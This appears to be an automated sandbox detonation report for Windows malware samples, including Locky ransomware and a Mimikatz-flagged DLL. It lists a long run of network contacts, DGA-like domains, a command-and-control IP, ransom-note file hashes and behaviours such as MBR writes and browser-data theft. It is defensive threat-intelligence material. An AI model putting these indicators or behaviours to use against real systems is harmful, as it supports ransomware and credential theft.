FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 71.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 105.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/428-0-0x0000000002210000-0x0000000002241000-memory.dmp

memory/428-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/428-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/428-4-0x0000000000400000-0x0000000000435000-memory.dmp

memory/428-7-0x0000000000400000-0x0000000000435000-memory.dmp

memory/428-11-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___OO7EZK42_.txt

MD5 9ac898cf0aaa69be9fc86600fc2082ac
SHA1 2bab2405c48e7fece90a14d840f33252ced09c08
SHA256 ed25a3cb729102a8ae8c1fe533c9348b7aebacfc0adf433cab7cfc8c0cf0f8d2
SHA512 1561e57addf3fbf330168ed370428d8e580bcb4323c8f5417c02f96e7f0406fcb526808781f5a7c92f226639646613613ea1af6f9b084190e098de1591d7f2f7

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___6T95GWH_.hta

MD5 bd44e1648a4fb5b3312f03395d917093
SHA1 68a196647b1b782601057c109c1cbc6ce9efef03
SHA256 570ed2c6a1fedfb2a8a526b6a2fa05232c7450e38596d639c536490986d214bc
SHA512 0b57e1fff52b2261ad9ecff5985cef0e04b901ba44bbf60f8a042c7f74cfa14581d88698e823fab3549159a98503c79d7887899c4a5ae0383f5951b749c701b0

memory/428-335-0x0000000000400000-0x0000000000435000-memory.dmp

memory/428-364-0x0000000000400000-0x0000000000435000-memory.dmp

memory/428-365-0x0000000000440000-0x0000000000451000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Signatures

Locky

ransomware locky

Locky family

locky

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Locky.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp

Files

memory/3160-0-0x0000000000870000-0x0000000000874000-memory.dmp

memory/3160-1-0x0000000000870000-0x0000000000874000-memory.dmp

memory/3160-2-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/3160-4-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/3160-6-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/3160-7-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/3160-9-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/3160-13-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/3160-15-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

149s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B4A.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
